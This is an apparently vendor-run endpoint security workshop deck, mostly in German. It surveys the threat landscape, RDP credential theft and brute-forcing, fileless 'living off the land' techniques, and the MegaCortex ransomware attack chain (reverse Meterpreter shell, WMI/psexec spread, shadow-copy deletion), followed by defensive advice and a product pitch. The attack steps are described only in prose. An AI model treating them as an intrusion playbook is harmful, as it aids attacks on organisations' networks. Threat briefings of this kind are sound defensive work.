endpoint detection and response workshop · some good news –use of exploit kits has fallen...
TRANSCRIPT
![Page 1: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/1.jpg)
Endpoint Detection and ResponseWorkshop
Sebastian KaiserSales Engineer
2019-06-051
![Page 2: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/2.jpg)
2
![Page 3: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/3.jpg)
3
![Page 4: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/4.jpg)
Publikumsbeteiligung 1
4
![Page 5: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/5.jpg)
Bedrohungslandschaft
5
![Page 6: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/6.jpg)
Cyber Attack Attribution Map – It sure looks fancy…
6
Who is Attacking?
77% Criminals
15% Espionage
5% Hacktivists
3% Warfare
We even have nation states launching ransomware
Stats – Hackmagedon.com
![Page 7: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/7.jpg)
Malware Statistik
7
![Page 8: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/8.jpg)
8
![Page 9: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/9.jpg)
Das Zeitalter der Einmal-Malware
75%
75% of the malicious files SophosLabs detects are found
only within a single organization.
400,000
Sophos Labs receives and processes 400,000 previously unseen malware
samples each day.
![Page 10: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/10.jpg)
Welche Malware-Typen sahen wir gestern?
67%
13%
ModerneMalware
Generische MalwareZero-Day Malware
2%
Crypto-Jacking
• Generische Malware• Varianten bekannter Malware / Toolkits
• Moderne Malware• (Bekannte) Exploits, Rechteausweitung,
Passwortdiebstahl, Persistenz
• Kombination mehrerer Techniken
• Ziele u.a. Banking-Zugangsdaten, Email-Adressen, Kreditkartendaten
• CryptoJacking• Bösartige Nutzung der CPU-Rechenleistung
zum Schürfen von Kryptowährungen
• Ransomware• Bösartige Verschlüsselung von Dateien und
Festplatten
• Zero-Day Malware• Zero-Day Angriffe in mehreren Stufen
• Würmer, Trojaner, VB Skript, PDF, dateilose Angriffe
Ransomware 5%
13%
Quelle: SophosLabs, August 2018, Region: CEEMEA
![Page 11: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/11.jpg)
Wer bedroht mich (heute)?
Skript Kiddies Verbrecher von heute
Skript Kiddie aus den 2000’ernHacker
Strom-Stehler
Erpresser
![Page 12: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/12.jpg)
Was schützt mich heute?
NextGenEndpoint
AntiVirusEDR
NextGenEndpoint
NextGenEndpoint
![Page 13: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/13.jpg)
Achtung!
13
EDR != mehr Schutz
![Page 14: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/14.jpg)
Achtung!
14
EDR = mehr Sichtbarkeit
![Page 15: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/15.jpg)
Achtung!
15
So viel Geld für etwas Sichtbarkeit?
![Page 16: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/16.jpg)
Come in and find exfil out
16
![Page 17: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/17.jpg)
So what can a Hacker do in 3 hours? How about 10 min?
17
RDP credentials for sale
Cost per RDP password - $3.00 to $16.00
![Page 18: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/18.jpg)
RDP Credential stores
18
UAS – Ultimate Anonymity Services
Over 40K RDP passwords for sale at any given time
![Page 19: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/19.jpg)
Many organizations allow RDP
19
• To allow remote access Windows makes it easy
• Turn on RDP
![Page 20: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/20.jpg)
20
![Page 21: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/21.jpg)
So how did they steal my RDP password?
21
Search the internet for devices that allow RDP authentication
Follow the online video demos on how to brute force RDP with NLBrute
![Page 22: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/22.jpg)
2018 Threat Space Change – Kill Chain Compression
PRE-BREACH POST-BREACH
Harvesting e-mail addresses, conference
information, etc.
With ‘hands on keyboard’ access,
intruders accomplish their
goal
Command channel for remote
manipulation of victim
Coupling exploit with backdoor into
deliverable payload
Delivering weaponized bundle to victim via email,
web …
Leveraging a vulnerability or functionality to execute code on victim’s machine
Installing malware on the asset
Delivery ExploitationRecon WeaponizationActions onObjective
Command& Control
Installation
Firewall, Web andE-mail Filtering,
Sandboxing, User Training
Traditional AV,File Scanning,White Listing,
SIEM, EDR and Anomaly Detection
![Page 23: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/23.jpg)
Some Good News – Use of Exploit Kits has fallen sharply
23
Fileless AttackCriminal uses
o Infect victim via Malvertisingo Deliver Ransomware, CryptoJackers, Botnets
and Banking Trojans
Exploit kits that are no-longer popular o Blackhole – Arrested (2013)o Angler – Russian crackdown (2016)o Neutrino – Went privateo Sundown – Stopped their service, code leakedo Disdain – Disappearedo Terror – Disappeared
Currently Active Kitso RIGo Grandsofto Magnitudeo Fallout
Tactical shift to malicious documents, macros and scripts
![Page 24: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/24.jpg)
Living off the land
• Powershell• Binary to HEX
• Upload to pastebin
• Load in memory
• NEVER TOUCHING THE DISK!
• cmd.exe
•WMIC
24
![Page 25: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/25.jpg)
Killchain?
25
![Page 26: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/26.jpg)
Cyber Kill ChainThe stages of a cyberattack
PRE-BREACH POST-BREACH
$ $ $
Actions onObjective
Command& Control
InstallationExploitationDelivery
![Page 27: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/27.jpg)
Cyber Kill ChainThe stages of a cyberattack
PRE-BREACH POST-BREACH
$ $ $
Actions onObjective
Command& Control
InstallationExploitationDelivery
![Page 28: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/28.jpg)
Cyber Kill ChainThe stages of a cyberattack
PRE-BREACH POST-BREACH
$ $ $
Actions onObjective
Command& Control
InstallationExploitationDelivery
![Page 29: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/29.jpg)
Cyber Kill ChainThe stages of a cyberattack
PRE-BREACH POST-BREACH
$ $ $
Actions onObjective
Command& Control
InstallationExploitationDelivery
![Page 30: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/30.jpg)
Cyber Kill ChainThe stages of a cyberattack
PRE-BREACH POST-BREACH
$ $ $
Actions onObjective
Command& Control
InstallationExploitationDelivery
![Page 31: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/31.jpg)
Ransomware Evolved!LockerGoga & MegaCortex
31
![Page 32: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/32.jpg)
Copy cats
32
SamSam BitPaymer Ryuk Dharma GandCrab
Type Targeted Targeted Targeted Targeted RaaS
Deployment RDP RDP RDP RDPRDP/Email/Exploitkits
Victim profileMedium/large organizations
Medium/large organizations
Medium/large organizations
Small organizations
Any
Typical ransom $40,000 $50,000-$1M+ $100,000 $5,000 $1,000-$8,000
Frequency 1+ per day Multiple per week Multiple per week Multiple per day Unknown
TargetsAll servers and endpoints
All servers All servers Critical servers Any
Regions affectedGlobal w/US concentration
Global Global Global Global
![Page 33: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/33.jpg)
33
![Page 34: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/34.jpg)
Was ist MegaCortex?
• Viele MATRIX-Referenzen (inkl. Schreibfehler)
• Ransomware mit automatisierten und manuellen Elementen = Blended threat
• Erste Samples Januar 2019 bei Virustotal
• Seit Mai 2019 vermehrte Angriffe auf Unternehmen
• MegaCortex ist kryptografisch signiert, Verweise auf andere Malwarefamilien
• Individuelle Version für jedes Opfer, mit 3-Stunden Zeitfenster für die Ausführung
• Infiziert vom Domain Controller aus alle erreichbaren Rechner
• Verschlüsselt Dateien, löscht Windows-Schattenkopien
![Page 35: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/35.jpg)
Vorgehen (1)
• Infektionsweg wahrscheinlich Emotet-/Qbot-Payload
• Vom infizierten Domain-Controller aus wird mit gestohlenen Admin-Zugangsdaten ein Powershell-Skript gestartet
• Das startet eine Reverse-Meterpreter-Shell, über die der Angreifer von Remote (manuell) Kommandos auf dem Domaincontroller ausführen kann
![Page 36: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/36.jpg)
Vorgehen (2)
• Vom DC wird die Malware per WMI (Windows Remote Administration) auf alle erreichbaren Clients verteilt und dort per psexec-Kopie gestartet
![Page 37: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/37.jpg)
Vorgehen (3)
• Auf den Clients werden per Batchdatei „stop.bat“: 44 Prozesse gekillt, 189 Dienste gestoppt und 194 Dienste deaktiviert
• Dann wird die eigentliche Ransomware „winnit.exe“ gestartet
![Page 38: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/38.jpg)
Vorgehen (4)
• MegaCortex verwendet zur Verschlüsselung ein DLL Modul, das von der Windows-Komponente rundll32.exe gestartet wird (eine Instanz pro 10 Dateien)
• MegaCortex löscht Schattenkopien
![Page 39: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/39.jpg)
Vorgehen (5)
• Dateien auf den infizierten Rechnern werden mit individuellem Schlüssel pro Rechner verschlüsselt
• Lösegeldforderung
![Page 40: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/40.jpg)
Übertragung ExploitAufklärung Bewaffnung AngriffszielBefehlskanalInstallation
EXE
vs.
APPLICATION CONTROL
NETWORK THREAT PROTECTION
LOCAL PRIVILEGE MITIGATION
APPLICATIONLOCKDOWN
CODE/MEMORY/APC MITIGATIONS
THREAT CASE (RCA) & EDR
CREDENTIAL THEFT PROTECTION
ANTI-RANSOMWARE
SYNCHRONIZEDSECURITY
DLL
MegaCortex
Verbreitung via• Rechteausweitung per gestohlenen
Admin-Zugangsdaten• WMI-Remoteausführung• Remote-PSEXEC
Persistenz• Deaktiviert Dienste
Command & Control• Reverse-Meterpreter-Shell per
Powershell-Skript
Payload• Kryptotrojaner
ANTI-VIRUS PUA HIPS
MACHINE LEARNING (ML)
![Page 41: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/41.jpg)
Bedrohungsfall
![Page 42: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/42.jpg)
![Page 43: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/43.jpg)
Übertragung ExploitAufklärung Bewaffnung AngriffszielBefehlskanalInstallation
EXE
vs. Schutztechnologien im Video
APPLICATION CONTROL
NETWORK THREAT PROTECTION
LOCAL PRIVILEGE MITIGATION
APPLICATIONLOCKDOWN
CODE/MEMORY/APC MITIGATIONS
THREAT CASE (RCA) & EDR
CREDENTIAL THEFT PROTECTION
ANTI-RANSOMWARE
SYNCHRONIZEDSECURITY
DLL
ANTI-VIRUS PUA HIPS
MegaCortex
Verbreitung via• Nutzung von gestohlenen Admin-
Zugangsdaten• WMI-Remoteausführung• Remote-PSEXEC
Persistenz• Killt Prozesse, deaktiviert Dienste
Command & Control• Reverse-Meterpreter-Shell per
Powershell-Skript
Payload• Kryptotrojaner
MACHINE LEARNING (ML)
![Page 44: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/44.jpg)
Übertragung ExploitAufklärung Bewaffnung AngriffszielBefehlskanalInstallation
EXE
vs. Schutztechnologien im Video
APPLICATION CONTROL
NETWORK THREAT PROTECTION
LOCAL PRIVILEGE MITIGATION
APPLICATIONLOCKDOWN
CODE/MEMORY/APC MITIGATIONS
THREAT CASE (RCA) & EDR
CREDENTIAL THEFT PROTECTION
ANTI-RANSOMWARE
SYNCHRONIZEDSECURITY
DLL
MegaCortex
Verbreitung via• Nutzung von gestohlenen Admin-
Zugangsdaten• WMI-Remoteausführung• Remote-PSEXEC
Persistenz• Killt Prozesse, deaktiviert Dienste
Command & Control• Reverse-Meterpreter-Shell per
Powershell-Skript
Payload• Kryptotrojaner
ANTI-VIRUS PUA HIPS
MACHINE LEARNING (ML)
![Page 45: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/45.jpg)
Wie schützte ich mich gegen ?
• 2-Faktor-Authentifizierung statt Passwörter
• Powershell sowie psexec/pskill deaktivieren
• Regelmäßige Backups offline/offsite
• Intercept X Advanced with EDR auf Workstations UND Servern
http://bit.ly/megacortexhttp://bit.ly/megacortex2
![Page 46: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/46.jpg)
Endpoint Evolved
46
![Page 47: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/47.jpg)
Damals: Schutz vor Malware
„Wir machen das schon“
CENTRAL
ENDPOINT
PROTECTION
![Page 48: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/48.jpg)
Gestern: Schutz vor Exploits + Ransomware
Überraschung: AntiVirus ist tot
Advanced
![Page 49: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/49.jpg)
Heute: Erkennung und Stoppen von Hacking
Es ist doch nicht so einfach, wie alle sagten!
Advanced with EDR
![Page 50: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/50.jpg)
Sophos Endpoint ProtectionCENTRAL ENDPOINT
PROTECTIONAdvanced Advanced with EDR
AV Signaturen / HIPS / Live Protection ✓ ✓ ✓
Device / Web / App Control ✓ ✓ ✓
Data Loss Protection (DLP) ✓ ✓ ✓
Malicious Traffic Detection (MTD) ✓ ✓ ✓ ✓
Security Heartbeat ✓ ✓ ✓ ✓
Deep Learning ✓ ✓ ✓
CryptoGuard ✓ ✓ ✓
WipeGuard ✓ ✓ ✓
Anti-Hacker-Technologien (CredGuard etc.) ✓ ✓ ✓
Exploit Protection ✓ ✓ ✓
Ursachenanalyse ✓ ✓ ✓
Automatische / manuelle Client-Isolation ✓/- ✓/- ✓/- ✓/✓
Malware-Analyse durch SophosLabs ✓
Unternehmensweite Bedrohungssuche ✓
Mitbewerber-Endpoint
Protection
![Page 51: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/51.jpg)
EDR ist ein ganzheitlicher Ansatz zur Endpoint-Sicherheit mit Fokus auf
• Erkennung von Ereignissen und Sicherheitsvorfällen
• Reaktion auf Sicherheitsvorfälle
• Suche nach Bedrohungen
• Forensische Untersuchung nach einem Vorfall
integriert alle EDR-Komponenten in einer einzigen Lösung
Was ist EDR (Endpoint Detection and Response)?
Advanced with EDR
![Page 52: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/52.jpg)
Für Unternehmen, die Angst vor
Ransomware haben
Advanced
Welches Produkt für wen?
CENTRAL
ENDPOINT
PROTECTION
Für Unternehmen,die glauben, dass
AntiVirus völlig ausreicht
Advanced with EDR
Für Unternehmen, die Angst vor
Ransomware und Hackern haben und dagegen auch etwas
tun wollen
![Page 53: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/53.jpg)
53
Viel zu teuer!Viel zu komplex!
Wir sind dafür nicht aufgestellt!
Unsere Daten interessieren niemanden!
Firewall und AntiVirus reichten schon immer!
![Page 54: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/54.jpg)
Das sind tatsächliche Aussagen, bevor überhaupt klar ist, welche Unterstützung EDR bieten kann.
![Page 55: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/55.jpg)
The need for EDR is defined by “the gap”
![Page 56: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/56.jpg)
MALICIOUS
BENIGN
MALICIOUS
BENIGN
“Traditional” EDR
MALICIOUS
BENIGN
![Page 57: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/57.jpg)
EDR Evolved
Second Generation
AI Automation
Scalable Expertise
Intelligent Information
First Generation
Manual Hunting
Resource Intensive
Endless Data
![Page 58: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/58.jpg)
Intelligent EDR – Now On Endpoint and Server
EDR starts with the Strongest Protection
Add Expertise, not Headcount
Guided Incident Response
![Page 59: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/59.jpg)
Beweis: Umfrage unter 3.100 IT-Verantwortlichen
Umfrage unter 3.100 IT-Verantwortliche weltweit in Unternehmen von 100-5.000 Mitarbeitern, Zeitraum Dez. 2018 - Jan.2019
StundenReaktionszeit
73%wurden
2018Opfer
durchschnittlichzweimal
wissen nicht, wiesie infiziert wurden
20%
4 TageAufwand pro Monatfür Untersuchungen, davon 85% umsonst
![Page 60: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/60.jpg)
Add Expertise, Not HeadcountThe First Detection and Response Solution for IT Generalists and the Specialist
Integrate and Interpret Threat Feeds
Detect and Prioritize Suspicious Events
Reverse Engineer Suspicious Files
Security Analyst Malware Analyst Threat Intelligence Analyst
![Page 61: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/61.jpg)
Live-Demo
Advanced with EDR
![Page 62: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/62.jpg)
ESH – File Info (explain ML PUA and Reputation)
62
